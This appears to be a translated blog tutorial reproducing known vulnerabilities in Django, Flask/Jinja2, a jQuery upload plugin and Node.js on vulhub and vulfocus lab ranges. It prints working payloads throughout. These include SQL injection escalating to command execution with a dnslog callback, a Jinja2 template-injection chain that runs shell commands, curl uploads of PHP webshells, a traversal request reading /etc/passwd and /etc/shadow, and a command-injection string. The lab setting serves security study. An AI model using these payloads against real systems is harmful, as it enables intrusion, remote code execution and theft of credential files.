Framework security-CVE vulnerability recurrence&Django&Flask&Node.js&JQuery framework vulnerability recurrence

Directory

• Service Attack and Defense – Framework Security &CVE Recurrence &Django &Flask &Node.JS &JQuery Vulnerability Recurrence
• • Introduction to middleware list
  • Common language development frameworks
  • Python development framework security-Django & Flask vulnerability recurrence
  • • Django development framework
    • Vulnerability recurrence
    • • CVE-2019-14234 (Django JSONField/HStoreField SQL injection vulnerability)
      • CVE-2021-35042 (Django QuerySet.order_by SQL injection vulnerability)
    • Flask Jinja2 SSTI
    • Vulnerability recurrence
    • • Flask (Jinja2) server-side template injection vulnerability
  • JavaScript Development Framework Security-Jquery & Node Vulnerability Recurrence
  • • jQuery framework
    • Vulnerability recurrence
    • • CVE_2018_9207-jQuery Upload File vulnerability recurrence
    • Node.js
    • Vulnerability recurrence
    • • Node.js directory traversal vulnerability (CVE-2017-14849)
      • Node.js command execution (CVE-2021-21315)

Service Attack and Defense-Framework Security & amp;CVE Recurrence & amp;Django & amp;Flask & amp;Node.JS & amp;JQuery Vulnerability Recurrence

Introduction to middleware list

Middleware and framework list:

IIS, Apache, Nginx, Tomcat, Docker, K8s, Weblogic, JBoos, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, Thinkphp, Spring, Flask, jQuery, etc.

1. Development framework-PHP-Laravel-Thinkphp

2. Development framework-Javaweb-St2-Spring

3. Development framework-Python-django-Flask

4. Development framework-Javascript-Node.js-JQuery

5. Other frameworks-Java-Apache Shiro & Apache Sorl

Common language development framework

PHP: Thinkphp Laravel YII CodeIgniter CakePHP Zend etc.

JAVA: Spring MyBatis Hibernate Struts2 Springboot etc.

Python: Django Flask Bottle Turbobars Tornado Web2py etc.

Javascript: Vue.js Node.js Bootstrap JQuery Angular etc.

Security testing of common middleware:

1. Improper configuration – parsing & weak passwords

2. Security mechanism-specific security vulnerabilities

3. Security mechanism-weak password blasting attack

4. Security application-framework specific security vulnerabilities

Middleware security testing process:

1. Determine middleware information – name & version & third party

2. Determine middleware problems-improper configuration & open vulnerabilities

3. Determine middleware utilization-weak password & EXP & framework vulnerabilities

Application service security testing process:

1. Determine service opening status – port scanning & combined applications, etc.

2. Determine the service type ownership-database & file transfer & communication, etc.

3. Determine service utilization methods – specific vulnerabilities & unauthorized & weak passwords, etc.

Development framework component security testing process:

1. Determine the types of common language development frameworks

2. Determine the CVE issues in the development framework

Python development framework security-Django & Flask vulnerability recurrence

Django development framework

Introduction: Detailed explanation of django (Python Web framework)

Django is an advanced Python web framework for quickly developing secure and maintainable websites. Built by experienced developers, Django takes care of the troublesome parts of website development, allowing you to focus on writing your application without having to develop it from scratch. It is free and open source, has an active and thriving community, rich documentation, and many free and paid solutions.

Django is a popular open source web framework written in Python that many websites and apps are based on.
Django development. Django adopts the MTV framework pattern, that is, model M, view V and template T, using
With Django, programmers can easily and quickly create high-quality, easy-to-maintain, database-driven applications. and
Django also contains many powerful third-party plug-ins, making Django highly scalable.

Security Question:

CVE_2019_14234

CVE-2021-35042

…

Vulnerability Recurrence

CVE-2019-14234 (Django JSONField/HStoreField SQL injection vulnerability)

The vulnerability requires developers to use JSONField/HStoreField; in addition, it is possible to control the field names of QuerySet. Django’s built-in application Django-Admin is affected, providing us with an easy way to reproduce the vulnerability.

Shooting range: vulhub

Reference: Django JSONField/HStoreField SQL injection vulnerability recurrence

Start the environment:

To access the web interface:

First, log in to Django-Admin using your username and password.

http://your-ip:8000/admin/

Account: admin Password: a123123123

Successful login:

Then go to the list view of the model:

http://your-ip:8000/admin/vuln/collection/

Collection

Add to the GET parameters, where is a JSONField:

detail__a'b=123 detail

payload:

http://your-ip:8000/admin/vuln/collection/?detail__a'b=123

You can see that the single quote injection is successful and the SQL statement reports an error:

Create cmd_exec:

payload:
/admin/vuln/collection/?detail__title')='1' or 1=1%
20;create table cmd_exec(cmd_output text)--

Execution effect:

Created successfully

Call cmd_exec to execute the command:

DNSlog gets address

payload:
/admin/vuln/collection/?detail__title')='1' or 1=1%
20;copy cmd_exec FROM PROGRAM 'ping xxxx.dnslog.cn'--

DNSlog echo effect:

CVE-2021-35042 (Django QuerySet.order_by SQL injection vulnerability)

The vulnerability requires developers to use the order_by functionality. In addition, you can control the input of the query set.

Shooting range: vulhub

Reference: Django QuerySet.order_by SQL injection vulnerability recurrence

Start the environment:

To access the web interface:

First, go to list view and add to GET parameters.

payload:

http://your-ip:8000/vuln/order=-id

After execution, you will see the data sorted by id in descending order:

payload:
Table of contents:
/vuln/?order=vuln_collection.name);select updatexml(1, concat
(0x7e,(select @@basedir)),1)#

Version:
/vuln/?order=vuln_collection.name);select updatexml(1, concat
(0x7e,(select version())),1)#

Database name:
/vuln/?order=vuln_collection.name);select updatexml(1, concat
(0x7e,(select database())),1)#

You can see that the single bracket has been injected successfully, and you can get the information from the error.

View catalog:

Explosive version number:

Explosive database name:

Flask Jinja2 SSTI

Introduction: Detailed explanation of Flask

Flask is a lightweight web application framework written in Python. Its WSGI toolbox uses
Werkzeug, the template engine uses Jinja2. Flask is licensed under BSD.

Flask is also called a “microframework” because it uses a simple core and uses extensions to add additional functionality. Flask does not have a default database or form validation tool.

Security Question:

Flask (Jinja2) server-side template injection vulnerability

…

Vulnerability Recurrence

Flask (Jinja2) server-side template injection vulnerability

Shooting range: vulhub

Reference: Flask (Jinja2) server-side template injection vulnerability recurrence

Start the environment:

To access the web interface:

Next, access http://your-ip/?name={{123*123}}. If you get the result 15129, it means that the SSTI vulnerability exists.

POC to get the eval function and execute arbitrary python code:

{<!-- -->% for c in [].__class__.__base__.__subclasses__() %}
{<!-- -->% if c.__name__ == 'catch_warnings' %}
  {<!-- -->% for b in c.__init__.__globals__.values() %}
  {<!-- -->% if b.__class__ == {<!-- -->}.__class__ %}
    {<!-- -->% if 'eval' in b.keys() %}
      {<!-- -->{<!-- --> b['eval']('__import__("os").popen("id").read()' ) }}
    {<!-- -->% endif %}
  {<!-- -->% endif %}
  {<!-- -->% endfor %}
{<!-- -->% endif %}
{<!-- -->% endfor %}

ps: URL encoding is required. After encoding, you can send it directly through GET request.

At the execution command point, customize the command to be executed and the information to be viewed. Each time the command is changed, the URL needs to be encoded and resent.

Other commands: ls, whoami

Execution effect:

JavaScript Development Framework Security-Jquery & Node Vulnerability Recurrence

jQuery framework

Introduction: Detailed explanation of jQuery

jQuery is a fast and concise JavaScript framework. It is another excellent JavaScript code library (framework) after Prototype. It was released by John Resig in January 2006. The purpose of jQuery’s design is “write less, do more”, which means writing less code and doing more things. It encapsulates common JavaScript function codes, provides a simple JavaScript design pattern, and optimizes HTML document operations, event processing, animation design and Ajax interaction.

Security Question:

CVE_2018_9207

CVE_2018_9208

CVE_2018_9209

…

Vulnerability Recurrence

CVE_2018_9207-jQuery Upload File vulnerability recurrence

jQuery is a fast and concise JavaScript framework. It is another excellent JavaScript code library (framework) after Prototype. It was released by John Resig in January 2006. jQuery Upload File <= 4.0.2 Any file upload in the root directory/jquery-upload-file

Shooting range: vulfocus

Open the shooting range:

To access the web interface:

Access the framework reference directory structure:

/jquery-upload-file/

use:

One command solves, accesses and uploads files.

payload:
//Visit the website and upload; the premise is to create a backdoor file in the folder.
curl -F "[email protected]" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"

curl -F "[email protected]" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"

Upload shell.php:

Upload cmd.php:

Check:

The location of the uploaded file: (the backdoor is php)

/jquery-upload-file/php/uploads/

Verify whether it can be parsed and executed:

Use Ant Sword to connect:

connection succeeded

The other security issues listed are basically the same.

Node.js

Detailed explanation: node.js detailed explanation

Node.js is a JavaScript running environment based on the Chrome V8 engine, used to conveniently build responses
Fast, easily scalable web applications.

Node.js optimizes some special use cases and provides alternative APIs to make V8 run better in non-browser environments. The V8 engine executes Javascript very quickly and has very good performance. It is a platform built on the Chrome JavaScript runtime. Used to easily build network applications with fast response and easy expansion

Security Question:

CVE_2021_21315

CVE_2017_14849

…

Vulnerability Recurrence

Node.js directory traversal vulnerability (CVE-2017-14849)

Joyent Node.js is a web application platform built on the Google V8 JavaScript engine from the American company Joyent. The platform is primarily used for building highly scalable applications and writing connection code that can handle tens of thousands of simultaneous connections to a physical machine. There is a security vulnerability in Joyent Node.js 8.5.0 versions prior to 8.6.0. A remote attacker could exploit this vulnerability to access sensitive files.

The cause of the vulnerability is that a logic error occurred when Node.js 8.5.0 performed the normalize operation on the directory, resulting in a jump to the upper layer (such as ../../../../ ../../etc/passwd), add foo/../ in the middle (such as ../../../foo/../ ../../../etc/passwd), you can make normalize return /etc/passwd, but in fact the correct result should be ../../../../../../etc/passwd.

Web frameworks such as express usually provide static file server functions, which rely on the normalize function. For example, when express determines whether the path exceeds the scope of the static directory, it uses the normalize function. The above bug causes the normalize function to return an incorrect result, thus bypassing the check and causing arbitrary files. Read vulnerability.

Shooting range: vulfocus

Reference: CVE-2017-14849 recurrence

Start the environment:

To access the web interface:

The file /static/main.js is referenced, indicating that there is a static file server.

Construct request:

Just send the following data packet through GET request:
GET:
...
/static/../../../a/../../../../etc/passwd
...

Complete data package:

GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: 192.168.100.134:56111
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml + xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

After sending to the resender, and then sending the packet again:

(If you open the web interface to capture packets, after structuring the request, the packet cannot be echoed normally and an error status code is reported. You can try to delete cookies and other related information, otherwise it may not be echoed normally and the error status code may not be echoed normally. If it is echoed normally, it is OK No need to delete.)

Effect: Successfully read the /etc/passwd file

Effect: Successfully read the /etc/shadow file

Node.js command execution (CVE-2021-21315)

Node.js-systeminformation is a Node.JS module used to obtain various system information. It contains a variety of lightweight functions that can retrieve detailed hardware and system-related information. The npm team released a security advisory, systeminformation in the Node.js library There is a command injection vulnerability (CVE-2021-21315) in the software package with a CVSSv3 score of 7.8. An attacker can execute system commands by injecting payload in unsanitized parameters.

Shooting range: vulfocus

Start the environment:

To access the web interface:

Construct a GET request:

payload：
/api/getServices?name[]=$(echo 'rumilc666' > rumi.txt)

After execution:

verify:

The file was generated successfully

docker ps
docker exec -it id /bin/bash